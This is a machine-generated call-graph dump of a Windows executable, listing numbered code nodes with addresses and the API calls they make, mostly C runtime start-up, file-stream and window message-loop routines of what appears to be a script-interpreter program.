40bca6 84511->84512 84513 40e4c0 84512->84513 84569 403350 84513->84569 84515 40e4cb RegOpenKeyExW 84516 427190 RegQueryValueExW 84515->84516 84517 40e4eb 84515->84517 84518 4271b0 84516->84518 84519 42721a RegCloseKey 84516->84519 84517->84500 84520 4115d7 52 API calls 84518->84520 84519->84500 84521 4271cb 84520->84521 84576 43652f 52 API calls 84521->84576 84523 4271d8 RegQueryValueExW 84524 42720e 84523->84524 84525 4271f7 84523->84525 84524->84519 84526 402160 52 API calls 84525->84526 84526->84524 84529 41389e 84527->84529 84535 41381a 84527->84535 84528 4139e8 84554 417f77 46 API calls __getptd_noexit 84528->84554 84529->84528 84531 413a00 84529->84531 84556 417f77 46 API calls __getptd_noexit 84531->84556 84532 4139ed 84555 417f25 10 API calls _xtow_s@20 84532->84555 84535->84529 84541 41388a 84535->84541 84549 419e30 46 API calls _xtow_s@20 84535->84549 84537 41396c 84537->84529 84538 413967 84537->84538 84542 41397a 84537->84542 84538->84489 84539 413929 84539->84529 84540 413945 84539->84540 84551 419e30 46 API calls _xtow_s@20 84539->84551 84540->84529 84540->84538 84545 41395b 84540->84545 84541->84529 84548 413909 84541->84548 84550 419e30 46 API calls _xtow_s@20 84541->84550 84553 419e30 46 API calls _xtow_s@20 84542->84553 84552 419e30 46 API calls _xtow_s@20 84545->84552 84548->84537 84548->84539 84549->84541 84550->84548 84551->84540 84552->84538 84553->84538 84554->84532 84555->84538 84556->84538 84558 419f13 84557->84558 84559 419f0e 84557->84559 84566 417f77 46 API calls __getptd_noexit 84558->84566 84559->84558 84565 419f2b 84559->84565 84563 40e454 84563->84492 84564 419f18 84567 417f25 10 API calls _xtow_s@20 84564->84567 84565->84563 84568 417f77 46 API calls __getptd_noexit 84565->84568 84566->84564 84567->84563 84568->84564 84570 403367 84569->84570 84571 403358 84569->84571 84572 4115d7 52 API calls 84570->84572 84571->84515 84573 403370 84572->84573 84574 4115d7 52 API calls 84573->84574 84575 40339e 84574->84575 84575->84515 84576->84523 84577 416454 84614 416c70 84577->84614 84579 416460 GetStartupInfoW 84580 416474 84579->84580 84615 419d5a HeapCreate 84580->84615 84582 4164cd 84585 4164d8 84582->84585 84699 41642b 46 API calls 3 library calls 84582->84699 84616 417c20 GetModuleHandleW 84585->84616 84586 4164de 84587 4164e9 __RTC_Initialize 84586->84587 84700 41642b 46 API calls 3 library calls 84586->84700 84635 41aaa1 GetStartupInfoW 84587->84635 84591 416503 GetCommandLineW 84648 41f584 GetEnvironmentStringsW 84591->84648 84595 416513 84654 41f4d6 GetModuleFileNameW 84595->84654 84597 41651d 84598 416528 84597->84598 84702 411924 46 API calls 3 library calls 84597->84702 84658 41f2a4 84598->84658 84601 41652e 84602 416539 84601->84602 84703 411924 46 API calls 3 library calls 84601->84703 84672 411703 84602->84672 84605 416541 84607 41654c __wwincmdln 84605->84607 84704 411924 46 API calls 3 library calls 84605->84704 84676 40d6b0 84607->84676 84610 41657c 84706 411906 46 API calls _doexit 84610->84706 84613 416581 __wfsopen 84614->84579 84615->84582 84617 417c34 84616->84617 84618 417c3d GetProcAddress GetProcAddress GetProcAddress GetProcAddress 84616->84618 84707 4178ff 49 API calls _free 84617->84707 84620 417c87 TlsAlloc 84618->84620 84623 417cd5 TlsSetValue 84620->84623 84624 417d96 84620->84624 84622 417c39 84622->84586 84623->84624 84625 417ce6 __init_pointers 84623->84625 84624->84586 84708 418151 InitializeCriticalSectionAndSpinCount 84625->84708 84627 417d91 84716 4178ff 49 API calls _free 84627->84716 84629 417d2a 84629->84627 84709 416b49 84629->84709 84632 417d76 84715 41793c 46 API calls 4 library calls 84632->84715 84634 417d7e GetCurrentThreadId 84634->84624 84636 416b49 __calloc_crt 46 API calls 84635->84636 84637 41aabf 84636->84637 84638 41ac34 84637->84638 84640 416b49 __calloc_crt 46 API calls 84637->84640 84643 4164f7 84637->84643 84644 41abb4 84637->84644 84639 41ac6a GetStdHandle 84638->84639 84641 41acce SetHandleCount 84638->84641 84642 41ac7c GetFileType 84638->84642 84647 41aca2 InitializeCriticalSectionAndSpinCount 84638->84647 84639->84638 84640->84637 84641->84643 84642->84638 84643->84591 84701 411924 46 API calls 3 library calls 84643->84701 84644->84638 84645 41abe0 GetFileType 84644->84645 84646 41abeb InitializeCriticalSectionAndSpinCount 84644->84646 84645->84644 84645->84646 84646->84643 84646->84644 84647->84638 84647->84643 84649 41f595 84648->84649 84650 41f599 84648->84650 84649->84595 84726 416b04 84650->84726 84652 41f5bb _memmove 84653 41f5c2 FreeEnvironmentStringsW 84652->84653 84653->84595 84655 41f50b _wparse_cmdline 84654->84655 84656 416b04 __malloc_crt 46 API calls 84655->84656 84657 41f54e _wparse_cmdline 84655->84657 84656->84657 84657->84597 84659 41f2bc _wcslen 84658->84659 84661 41f2b4 84658->84661 84660 416b49 __calloc_crt 46 API calls 84659->84660 84663 41f2e0 _wcslen 84660->84663 84661->84601 84662 41f336 84733 413748 84662->84733 84663->84661 84663->84662 84665 416b49 __calloc_crt 46 API calls 84663->84665 84666 41f35c 84663->84666 84669 41f373 84663->84669 84732 41ef12 46 API calls _xtow_s@20 84663->84732 84665->84663 84667 413748 _free 46 API calls 84666->84667 84667->84661 84739 417ed3 84669->84739 84671 41f37f 84671->84601 84673 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 84672->84673 84675 411750 __IsNonwritableInCurrentImage 84673->84675 84758 41130a 51 API calls __cinit 84673->84758 84675->84605 84677 42e2f3 84676->84677 84678 40d6cc 84676->84678 84759 408f40 84678->84759 84680 40d707 84763 40ebb0 84680->84763 84683 40d737 84766 411951 84683->84766 84688 40d751 84778 40f4e0 SystemParametersInfoW SystemParametersInfoW 84688->84778 84690 40d75f 84779 40d590 GetCurrentDirectoryW 84690->84779 84692 40d767 SystemParametersInfoW 84693 40d794 84692->84693 84694 40d78d FreeLibrary 84692->84694 84695 408f40 VariantClear 84693->84695 84694->84693 84696 40d79d 84695->84696 84697 408f40 VariantClear 84696->84697 84698 40d7a6 84697->84698 84698->84610 84705 4118da 46 API calls _doexit 84698->84705 84699->84585 84700->84587 84705->84610 84706->84613 84707->84622 84708->84629 84711 416b52 84709->84711 84712 416b8f 84711->84712 84713 416b70 Sleep 84711->84713 84717 41f677 84711->84717 84712->84627 84712->84632 84714 416b85 84713->84714 84714->84711 84714->84712 84715->84634 84716->84624 84718 41f683 84717->84718 84722 41f69e _malloc 84717->84722 84719 41f68f 84718->84719 84718->84722 84725 417f77 46 API calls __getptd_noexit 84719->84725 84721 41f6b1 HeapAlloc 84721->84722 84723 41f6d8 84721->84723 84722->84721 84722->84723 84723->84711 84724 41f694 84724->84711 84725->84724 84729 416b0d 84726->84729 84727 4135bb _malloc 45 API calls 84727->84729 84728 416b43 84728->84652 84729->84727 84729->84728 84730 416b24 Sleep 84729->84730 84731 416b39 84730->84731 84731->84728 84731->84729 84732->84663 84734 413753 RtlFreeHeap 84733->84734 84738 41377c __dosmaperr 84733->84738 84735 413768 84734->84735 84734->84738 84742 417f77 46 API calls __getptd_noexit 84735->84742 84737 41376e GetLastError 84737->84738 84738->84661 84743 417daa 84739->84743 84742->84737 84744 417dc9 __setmbcp_nolock __call_reportfault 84743->84744 84745 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 84744->84745 84748 417eb5 __call_reportfault 84745->84748 84747 417ed1 GetCurrentProcess TerminateProcess 84747->84671 84749 41a208 84748->84749 84750 41a210 84749->84750 84751 41a212 IsDebuggerPresent 84749->84751 84750->84747 84757 41fe19 84751->84757 84754 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 84755 421ff0 __call_reportfault 84754->84755 84756 421ff8 GetCurrentProcess TerminateProcess 84754->84756 84755->84756 84756->84747 84757->84754 84758->84675 84760 408f48 ctype 84759->84760 84761 4265c7 VariantClear 84760->84761 84762 408f55 ctype 84760->84762 84761->84762 84762->84680 84819 40ebd0 84763->84819 84823 4182cb 84766->84823 84768 41195e 84830 4181f2 LeaveCriticalSection 84768->84830 84770 40d748 84771 4119b0 84770->84771 84772 4119d6 84771->84772 84773 4119bc 84771->84773 84772->84688 84773->84772 84865 417f77 46 API calls __getptd_noexit 84773->84865 84775 4119c6 84866 417f25 10 API calls _xtow_s@20 84775->84866 84777 4119d1 84777->84688 84778->84690 84867 401f20 84779->84867 84781 40d5b6 IsDebuggerPresent 84782 40d5c4 84781->84782 84783 42e1bb MessageBoxA 84781->84783 84784 42e1d4 84782->84784 84785 40d5e3 84782->84785 84783->84784 85039 403a50 52 API calls 3 library calls 84784->85039 84937 40f520 84785->84937 84789 40d5fd GetFullPathNameW 84949 401460 84789->84949 84791 40d63b 84792 40d643 84791->84792 84793 42e231 SetCurrentDirectoryW 84791->84793 84794 40d64c 84792->84794 85040 432fee 6 API calls 84792->85040 84793->84792 84964 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 84794->84964 84797 42e252 84797->84794 84799 42e25a GetModuleFileNameW 84797->84799 84801 42e274 84799->84801 84802 42e2cb GetForegroundWindow ShellExecuteW 84799->84802 85041 401b10 84801->85041 84804 40d688 84802->84804 84803 40d656 84806 40d669 84803->84806 84808 40e0c0 74 API calls 84803->84808 84811 40d692 SetCurrentDirectoryW 84804->84811 84972 4091e0 84806->84972 84808->84806 84811->84692 84813 42e28d 85048 40d200 52 API calls 2 library calls 84813->85048 84816 42e299 GetForegroundWindow ShellExecuteW 84817 42e2c6 84816->84817 84817->84804 84818 40ec00 LoadLibraryA GetProcAddress 84818->84683 84820 40d72e 84819->84820 84821 40ebd6 LoadLibraryA 84819->84821 84820->84683 84820->84818 84821->84820 84822 40ebe7 GetProcAddress 84821->84822 84822->84820 84824 4182e0 84823->84824 84825 4182f3 EnterCriticalSection 84823->84825 84831 418209 84824->84831 84825->84768 84827 4182e6 84827->84825 84858 411924 46 API calls 3 library calls 84827->84858 84830->84770 84832 418215 __wfsopen 84831->84832 84833 418225 84832->84833 84834 41823d 84832->84834 84859 418901 46 API calls __NMSG_WRITE 84833->84859 84836 41824b __wfsopen 84834->84836 84837 416b04 __malloc_crt 45 API calls 84834->84837 84836->84827 84839 418256 84837->84839 84838 41822a 84860 418752 46 API calls 5 library calls 84838->84860 84841 41825d 84839->84841 84842 41826c 84839->84842 84862 417f77 46 API calls __getptd_noexit 84841->84862 84845 4182cb __lock 45 API calls 84842->84845 84843 418231 84861 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84843->84861 84847 418273 84845->84847 84849 4182a6 84847->84849 84850 41827b InitializeCriticalSectionAndSpinCount 84847->84850 84851 413748 _free 45 API calls 84849->84851 84852 418297 84850->84852 84853 41828b 84850->84853 84851->84852 84864 4182c2 LeaveCriticalSection _doexit 84852->84864 84854 413748 _free 45 API calls 84853->84854 84856 418291 84854->84856 84863 417f77 46 API calls __getptd_noexit 84856->84863 84859->84838 84860->84843 84862->84836 84863->84852 84864->84836 84865->84775 84866->84777 85049 40e6e0 84867->85049 84871 401f41 GetModuleFileNameW 85067 410100 84871->85067 84873 401f5c 85079 410960 84873->85079 84876 401b10 52 API calls 84877 401f81 84876->84877 85082 401980 84877->85082 84879 401f8e 84880 408f40 VariantClear 84879->84880 84881 401f9d 84880->84881 84882 401b10 52 API calls 84881->84882 84883 401fb4 84882->84883 84884 401980 53 API calls 84883->84884 84885 401fc3 84884->84885 84886 401b10 52 API calls 84885->84886 84887 401fd2 84886->84887 85090 40c2c0 84887->85090 84889 401fe1 84890 40bc70 52 API calls 84889->84890 84891 401ff3 84890->84891 85108 401a10 84891->85108 84893 401ffe 85115 4114ab 84893->85115 84896 428b05 84898 401a10 52 API calls 84896->84898 84897 402017 84899 4114ab __wcsicoll 58 API calls 84897->84899 84900 428b18 84898->84900 84901 402022 84899->84901 84903 401a10 52 API calls 84900->84903 84901->84900 84902 40202d 84901->84902 84904 4114ab __wcsicoll 58 API calls 84902->84904 84905 428b33 84903->84905 84906 402038 84904->84906 84908 428b3b GetModuleFileNameW 84905->84908 84907 402043 84906->84907 84906->84908 84909 4114ab __wcsicoll 58 API calls 84907->84909 84910 401a10 52 API calls 84908->84910 84911 40204e 84909->84911 84912 428b6c 84910->84912 84913 402092 84911->84913 84917 401a10 52 API calls 84911->84917 84922 428b90 _wcscpy 84911->84922 84914 40e0a0 52 API calls 84912->84914 84916 4020a3 84913->84916 84913->84922 84915 428b7a 84914->84915 84918 401a10 52 API calls 84915->84918 84919 428bc6 84916->84919 85123 40e830 53 API calls 84916->85123 84920 402073 _wcscpy 84917->84920 84921 428b88 84918->84921 84928 401a10 52 API calls 84920->84928 84921->84922 84924 401a10 52 API calls 84922->84924 84932 4020d0 84924->84932 84925 4020bb 85124 40cf00 53 API calls 84925->85124 84927 4020c6 84929 408f40 VariantClear 84927->84929 84928->84913 84929->84932 84930 402110 84934 408f40 VariantClear 84930->84934 84932->84930 84935 401a10 52 API calls 84932->84935 85125 40cf00 53 API calls 84932->85125 85126 40e6a0 53 API calls 84932->85126 84936 402120 ctype 84934->84936 84935->84932 84936->84781 84938 4295c9 __setmbcp_nolock 84937->84938 84939 40f53c 84937->84939 84942 4295d9 GetOpenFileNameW 84938->84942 85819 410120 84939->85819 84941 40f545 85823 4102b0 SHGetMalloc 84941->85823 84942->84939 84943 40d5f5 84942->84943 84943->84789 84943->84791 84945 40f54c 85828 410190 GetFullPathNameW 84945->85828 84947 40f559 85839 40f570 84947->85839 85901 402400 84949->85901 84951 40146f 84954 428c29 _wcscat 84951->84954 85910 401500 84951->85910 84953 40147c 84953->84954 85918 40d440 84953->85918 84956 401489 84956->84954 84957 401491 GetFullPathNameW 84956->84957 84958 402160 52 API calls 84957->84958 84959 4014bb 84958->84959 84960 402160 52 API calls 84959->84960 84961 4014c8 84960->84961 84961->84954 84962 402160 52 API calls 84961->84962 84963 4014ee 84962->84963 84963->84791 84965 428361 84964->84965 84966 4103fc LoadImageW RegisterClassExW 84964->84966 85938 44395e EnumResourceNamesW LoadImageW 84965->85938 85937 410490 7 API calls 84966->85937 84969 40d651 84971 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 84969->84971 84970 428368 84971->84803 84973 409202 84972->84973 84974 42d7ad 84972->84974 85031 409216 ctype 84973->85031 86210 410940 331 API calls 84973->86210 86213 45e737 90 API calls 3 library calls 84974->86213 84977 409386 84978 40939c 84977->84978 86211 40f190 10 API calls 84977->86211 84978->84804 85038 401000 Shell_NotifyIconW __setmbcp_nolock 84978->85038 84980 4095b2 84980->84978 84982 4095bf 84980->84982 84981 409253 PeekMessageW 84981->85031 86212 401a50 331 API calls 84982->86212 84984 40d410 VariantClear 84984->85031 84985 42d8cd Sleep 84985->85031 84986 4095c6 LockWindowUpdate DestroyWindow GetMessageW 84986->84978 84989 4095f9 84986->84989 84988 42e13b 86231 40d410 VariantClear 84988->86231 84991 42e158 TranslateMessage DispatchMessageW GetMessageW 84989->84991 84991->84991 84994 42e188 84991->84994 84993 409567 PeekMessageW 84993->85031 84994->84978 84997 46fdbf 108 API calls 85037 4094e0 84997->85037 84998 46f3c1 107 API calls 84998->85031 84999 40e0a0 52 API calls 84999->85031 85000 409551 TranslateMessage DispatchMessageW 85000->84993 85002 42dcd2 WaitForSingleObject 85003 42dcf0 GetExitCodeProcess CloseHandle 85002->85003 85002->85031 86220 40d410 VariantClear 85003->86220 85005 44c29d 52 API calls 85005->85037 85006 42dd3d Sleep 85006->85037 85009 4094cf Sleep 85009->85037 85011 42d94d timeGetTime 86216 465124 53 API calls 85011->86216 85013 40c620 timeGetTime 85013->85037 85016 42dd89 CloseHandle 85016->85037 85017 47d33e 309 API calls 85017->85031 85018 408f40 VariantClear 85018->85037 85020 465124 53 API calls 85020->85037 85021 42de19 GetExitCodeProcess CloseHandle 85021->85037 85024 42de88 Sleep 85024->85031 85027 45e737 90 API calls 85027->85031 85030 42e0cc VariantClear 85030->85031 85031->84977 85031->84981 85031->84984 85031->84985 85031->84988 85031->84993 85031->84998 85031->84999 85031->85000 85031->85002 85031->85006 85031->85009 85031->85011 85031->85017 85031->85027 85031->85030 85032 408f40 VariantClear 85031->85032 85031->85037 85939 4091b0 85031->85939 85997 40afa0 85031->85997 86023 408fc0 85031->86023 86058 408cc0 85031->86058 86072 40d150 85031->86072 86077 40d170 85031->86077 86083 4096a0 85031->86083 86214 465124 53 API calls 85031->86214 86215 40c620 timeGetTime 85031->86215 86230 40e270 VariantClear ctype 85031->86230 85032->85031 85033 401b10 52 API calls 85033->85037 85035 401980 53 API calls 85035->85037 85037->84997 85037->85005 85037->85013 85037->85016 85037->85018 85037->85020 85037->85021 85037->85024 85037->85031 85037->85033 85037->85035 86217 45178a 54 API calls 85037->86217 86218 47d33e 331 API calls 85037->86218 86219 453bc6 54 API calls 85037->86219 86221 40d410 VariantClear 85037->86221 86222 443d19 67 API calls _wcslen 85037->86222 86223 4574b4 VariantClear 85037->86223 86224 403cd0 85037->86224 86228 4731e1 VariantClear 85037->86228 86229 4331a2 6 API calls 85037->86229 85038->84804 85039->84791 85040->84797 85042 401b16 _wcslen 85041->85042 85043 4115d7 52 API calls 85042->85043 85044 401b63 85042->85044 85045 401b4b _memmove 85043->85045 85047 40d200 52 API calls 2 library calls 85044->85047 85046 4115d7 52 API calls 85045->85046 85046->85044 85047->84813 85048->84816 85050 40bc70 52 API calls 85049->85050 85051 401f31 85050->85051 85052 402560 85051->85052 85053 40256d __write_nolock 85052->85053 85054 402160 52 API calls 85053->85054 85056 402593 85054->85056 85065 4025bd 85056->85065 85127 401c90 85056->85127 85057 4026f0 52 API calls 85057->85065 85058 4026a7 85059 401b10 52 API calls 85058->85059 85064 4026db 85058->85064 85061 4026d1 85059->85061 85060 401b10 52 API calls 85060->85065 85131 40d7c0 52 API calls 2 library calls 85061->85131 85064->84871 85065->85057 85065->85058 85065->85060 85066 401c90 52 API calls 85065->85066 85130 40d7c0 52 API calls 2 library calls 85065->85130 85066->85065 85132 40f760 85067->85132 85070 410118 85070->84873 85072 42805d 85076 42806a 85072->85076 85188 431e58 85072->85188 85073 413748 _free 46 API calls 85075 428078 85073->85075 85077 431e58 82 API calls 85075->85077 85076->85073 85078 428084 85077->85078 85078->84873 85080 4115d7 52 API calls 85079->85080 85081 401f74 85080->85081 85081->84876 85083 4019a3 85082->85083 85088 401985 85082->85088 85084 4019b8 85083->85084 85083->85088 85808 403e10 53 API calls 85084->85808 85085 40199f 85085->84879 85087 4019c4 85087->84879 85088->85085 85807 403e10 53 API calls 85088->85807 85091 40c2c7 85090->85091 85092 40c30e 85090->85092 85095 40c2d3 85091->85095 85096 426c79 85091->85096 85093 40c315 85092->85093 85094 426c2b 85092->85094 85097 40c321 85093->85097 85098 426c5a 85093->85098 85100 426c4b 85094->85100 85101 426c2e 85094->85101 85809 403ea0 52 API calls __cinit 85095->85809 85814 4534e3 52 API calls 85096->85814 85810 403ea0 52 API calls __cinit 85097->85810 85813 4534e3 52 API calls 85098->85813 85812 4534e3 52 API calls 85100->85812 85107 40c2de 85101->85107 85811 4534e3 52 API calls 85101->85811 85107->84889 85109 401a30 85108->85109 85110 401a17 85108->85110 85111 402160 52 API calls 85109->85111 85112 401a2d 85110->85112 85815 403c30 52 API calls _memmove 85110->85815 85113 401a3d 85111->85113 85112->84893 85113->84893 85116 411523 85115->85116 85117 4114ba 85115->85117 85818 4113a8 58 API calls 3 library calls 85116->85818 85120 40200c 85117->85120 85816 417f77 46 API calls __getptd_noexit 85117->85816 85120->84896 85120->84897 85121 4114c6 85817 417f25 10 API calls _xtow_s@20 85121->85817 85123->84925 85124->84927 85125->84932 85126->84932 85128 4026f0 52 API calls 85127->85128 85129 401c97 85128->85129 85129->85056 85130->85065 85131->85064 85192 40f6f0 85132->85192 85134 40f77b _strcat ctype 85200 40f850 85134->85200 85139 427c2a 85229 414d04 85139->85229 85141 40f7fc 85141->85139 85142 40f804 85141->85142 85216 414a46 85142->85216 85146 40f80e 85146->85070 85151 4528bd 85146->85151 85148 427c59 85235 414fe2 85148->85235 85150 427c79 85152 4150d1 _fseek 81 API calls 85151->85152 85153 452930 85152->85153 85732 452719 85153->85732 85156 452948 85156->85072 85157 414d04 __fread_nolock 61 API calls 85158 452966 85157->85158 85159 414d04 __fread_nolock 61 API calls 85158->85159 85160 452976 85159->85160 85161 414d04 __fread_nolock 61 API calls 85160->85161 85162 45298f 85161->85162 85163 414d04 __fread_nolock 61 API calls 85162->85163 85164 4529aa 85163->85164 85165 4150d1 _fseek 81 API calls 85164->85165 85166 4529c4 85165->85166 85167 4135bb _malloc 46 API calls 85166->85167 85168 4529cf 85167->85168 85169 4135bb _malloc 46 API calls 85168->85169 85170 4529db 85169->85170 85171 414d04 __fread_nolock 61 API calls 85170->85171 85172 4529ec 85171->85172 85173 44afef GetSystemTimeAsFileTime 85172->85173 85174 452a00 85173->85174 85175 452a36 85174->85175 85176 452a13 85174->85176 85178 452aa5 85175->85178 85179 452a3c 85175->85179 85177 413748 _free 46 API calls 85176->85177 85180 452a1c 85177->85180 85182 413748 _free 46 API calls 85178->85182 85738 44b1a9 85179->85738 85183 413748 _free 46 API calls 85180->85183 85185 452aa3 85182->85185 85186 452a25 85183->85186 85184 452a9d 85187 413748 _free 46 API calls 85184->85187 85185->85072 85186->85072 85187->85185 85189 431e64 85188->85189 85190 431e6a 85188->85190 85191 414a46 __fcloseall 82 API calls 85189->85191 85190->85076 85191->85190 85193 425de2 85192->85193 85194 40f6fc _wcslen 85192->85194 85193->85134 85195 40f710 WideCharToMultiByte 85194->85195 85196 40f756 85195->85196 85197 40f728 85195->85197 85196->85134 85198 4115d7 52 API calls 85197->85198 85199 40f735 WideCharToMultiByte 85198->85199 85199->85134 85202 40f85d __setmbcp_nolock _strlen 85200->85202 85203 40f7ab 85202->85203 85248 414db8 85202->85248 85204 4149c2 85203->85204 85260 414904 85204->85260 85206 40f7e9 85206->85139 85207 40f5c0 85206->85207 85208 40f5cd _strcat __write_nolock _memmove 85207->85208 85209 414d04 __fread_nolock 61 API calls 85208->85209 85211 425d11 85208->85211 85215 40f691 __tzset_nolock 85208->85215 85348 4150d1 85208->85348 85209->85208 85212 4150d1 _fseek 81 API calls 85211->85212 85213 425d33 85212->85213 85214 414d04 __fread_nolock 61 API calls 85213->85214 85214->85215 85215->85141 85217 414a52 __wfsopen 85216->85217 85218 414a64 85217->85218 85219 414a79 85217->85219 85488 417f77 46 API calls __getptd_noexit 85218->85488 85222 415471 __lock_file 47 API calls 85219->85222 85227 414a74 __wfsopen 85219->85227 85221 414a69 85489 417f25 10 API calls _xtow_s@20 85221->85489 85224 414a92 85222->85224 85472 4149d9 85224->85472 85227->85146 85557 414c76 85229->85557 85231 414d1c 85232 44afef 85231->85232 85725 442c5a 85232->85725 85234 44b00d 85234->85148 85236 414fee __wfsopen 85235->85236 85237 414ffa 85236->85237 85238 41500f 85236->85238 85729 417f77 46 API calls __getptd_noexit 85237->85729 85240 415471 __lock_file 47 API calls 85238->85240 85241 415017 85240->85241 85243 414e4e __ftell_nolock 51 API calls 85241->85243 85242 414fff 85730 417f25 10 API calls _xtow_s@20 85242->85730 85245 415024 85243->85245 85731 41503d LeaveCriticalSection LeaveCriticalSection __wfsopen 85245->85731 85246 41500a __wfsopen 85246->85150 85249 414dd6 85248->85249 85250 414deb 85248->85250 85257 417f77 46 API calls __getptd_noexit 85249->85257 85250->85249 85254 414df2 85250->85254 85252 414ddb 85258 417f25 10 API calls _xtow_s@20 85252->85258 85255 414de6 85254->85255 85259 418f98 77 API calls 6 library calls 85254->85259 85255->85202 85257->85252 85258->85255 85259->85255 85263 414910 __wfsopen 85260->85263 85261 414923 85316 417f77 46 API calls __getptd_noexit 85261->85316 85263->85261 85265 414951 85263->85265 85264 414928 85317 417f25 10 API calls _xtow_s@20 85264->85317 85279 41d4d1 85265->85279 85268 414956 85269 41496a 85268->85269 85270 41495d 85268->85270 85272 414992 85269->85272 85273 414972 85269->85273 85318 417f77 46 API calls __getptd_noexit 85270->85318 85296 41d218 85272->85296 85319 417f77 46 API calls __getptd_noexit 85273->85319 85274 414933 __wfsopen @_EH4_CallFilterFunc@8 85274->85206 85280 41d4dd __wfsopen 85279->85280 85281 4182cb __lock 46 API calls 85280->85281 85292 41d4eb 85281->85292 85282 41d567 85284 416b04 __malloc_crt 46 API calls 85282->85284 85286 41d56e 85284->85286 85285 41d5f0 __wfsopen 85285->85268 85287 41d57c InitializeCriticalSectionAndSpinCount 85286->85287 85294 41d560 85286->85294 85290 41d59c 85287->85290 85291 41d5af EnterCriticalSection 85287->85291 85288 418209 __mtinitlocknum 46 API calls 85288->85292 85293 413748 _free 46 API calls 85290->85293 85291->85294 85292->85282 85292->85288 85292->85294 85324 4154b2 47 API calls __lock 85292->85324 85325 415520 LeaveCriticalSection LeaveCriticalSection _doexit 85292->85325 85293->85294 85321 41d5fb 85294->85321 85297 41d23a 85296->85297 85298 41d255 85297->85298 85310 41d26c __wopenfile 85297->85310 85330 417f77 46 API calls __getptd_noexit 85298->85330 85300 41d421 85303 41d47a 85300->85303 85304 41d48c 85300->85304 85301 41d25a 85331 417f25 10 API calls _xtow_s@20 85301->85331 85335 417f77 46 API calls __getptd_noexit 85303->85335 85327 422bf9 85304->85327 85307 41499d 85320 4149b8 LeaveCriticalSection LeaveCriticalSection __wfsopen 85307->85320 85308 41d47f 85336 417f25 10 API calls _xtow_s@20 85308->85336 85310->85300 85310->85303 85310->85310 85332 41341f 58 API calls 2 library calls 85310->85332 85312 41d41a 85312->85300 85333 41341f 58 API calls 2 library calls 85312->85333 85314 41d439 85314->85300 85334 41341f 58 API calls 2 library calls 85314->85334 85316->85264 85317->85274 85318->85274 85319->85274 85320->85274 85326 4181f2 LeaveCriticalSection 85321->85326 85323 41d602 85323->85285 85324->85292 85325->85292 85326->85323 85337 422b35 85327->85337 85329 422c14 85329->85307 85330->85301 85331->85307 85332->85312 85333->85314 85334->85300 85335->85308 85336->85307 85340 422b41 __wfsopen 85337->85340 85338 422b54 85339 417f77 _xtow_s@20 46 API calls 85338->85339 85341 422b59 85339->85341 85340->85338 85342 422b8a 85340->85342 85343 417f25 _xtow_s@20 10 API calls 85341->85343 85344 422400 __tsopen_nolock 109 API calls 85342->85344 85347 422b63 __wfsopen 85343->85347 85345 422ba4 85344->85345 85346 422bcb __wsopen_helper LeaveCriticalSection 85345->85346 85346->85347 85347->85329 85351 4150dd __wfsopen 85348->85351 85349 4150e9 85379 417f77 46 API calls __getptd_noexit 85349->85379 85351->85349 85352 41510f 85351->85352 85361 415471 85352->85361 85353 4150ee 85380 417f25 10 API calls _xtow_s@20 85353->85380 85360 4150f9 __wfsopen 85360->85208 85362 415483 85361->85362 85363 4154a5 EnterCriticalSection 85361->85363 85362->85363 85364 41548b 85362->85364 85365 415117 85363->85365 85366 4182cb __lock 46 API calls 85364->85366 85367 415047 85365->85367 85366->85365 85368 415067 85367->85368 85369 415057 85367->85369 85374 415079 85368->85374 85382 414e4e 85368->85382 85437 417f77 46 API calls __getptd_noexit 85369->85437 85373 41505c 85381 415143 LeaveCriticalSection LeaveCriticalSection __wfsopen 85373->85381 85399 41443c 85374->85399 85377 4150b9 85412 41e1f4 85377->85412 85379->85353 85380->85360 85381->85360 85383 414e61 85382->85383 85384 414e79 85382->85384 85438 417f77 46 API calls __getptd_noexit 85383->85438 85386 414139 _fprintf 46 API calls 85384->85386 85388 414e80 85386->85388 85387 414e66 85439 417f25 10 API calls _xtow_s@20 85387->85439 85390 41e1f4 __write 51 API calls 85388->85390 85391 414e97 85390->85391 85392 414f09 85391->85392 85394 414ec9 85391->85394 85398 414e71 85391->85398 85440 417f77 46 API calls __getptd_noexit 85392->85440 85395 41e1f4 __write 51 API calls 85394->85395 85394->85398 85396 414f64 85395->85396 85397 41e1f4 __write 51 API calls 85396->85397 85396->85398 85397->85398 85398->85374 85400 414477 85399->85400 85401 414455 85399->85401 85405 414139 85400->85405 85401->85400 85402 414139 _fprintf 46 API calls 85401->85402 85403 414470 85402->85403 85441 41b7b2 77 API calls 5 library calls 85403->85441 85406 414145 85405->85406 85407 41415a 85405->85407 85442 417f77 46 API calls __getptd_noexit 85406->85442 85407->85377 85409 41414a 85443 417f25 10 API calls _xtow_s@20 85409->85443 85411 414155 85411->85377 85413 41e200 __wfsopen 85412->85413 85414 41e223 85413->85414 85415 41e208 85413->85415 85417 41e22f 85414->85417 85420 41e269 85414->85420 85464 417f8a 46 API calls __getptd_noexit 85415->85464 85466 417f8a 46 API calls __getptd_noexit 85417->85466 85418 41e20d 85465 417f77 46 API calls __getptd_noexit 85418->85465 85444 41ae56 85420->85444 85422 41e234 85467 417f77 46 API calls __getptd_noexit 85422->85467 85425 41e26f 85427 41e291 85425->85427 85428 41e27d 85425->85428 85426 41e23c 85468 417f25 10 API calls _xtow_s@20 85426->85468 85469 417f77 46 API calls __getptd_noexit 85427->85469 85454 41e17f 85428->85454 85430 41e215 __wfsopen 85430->85373 85433 41e289 85471 41e2c0 LeaveCriticalSection __unlock_fhandle 85433->85471 85434 41e296 85470 417f8a 46 API calls __getptd_noexit 85434->85470 85437->85373 85438->85387 85439->85398 85440->85398 85441->85400 85442->85409 85443->85411 85445 41ae62 __wfsopen 85444->85445 85446 41aebc 85445->85446 85448 4182cb __lock 46 API calls 85445->85448 85447 41aec1 EnterCriticalSection 85446->85447 85450 41aede __wfsopen 85446->85450 85447->85450 85449 41ae8e 85448->85449 85451 41aeaa 85449->85451 85452 41ae97 InitializeCriticalSectionAndSpinCount 85449->85452 85450->85425 85453 41aeec ___lock_fhandle LeaveCriticalSection 85451->85453 85452->85451 85453->85446 85455 41aded __lseeki64_nolock 46 API calls 85454->85455 85456 41e18e 85455->85456 85457 41e1a4 SetFilePointer 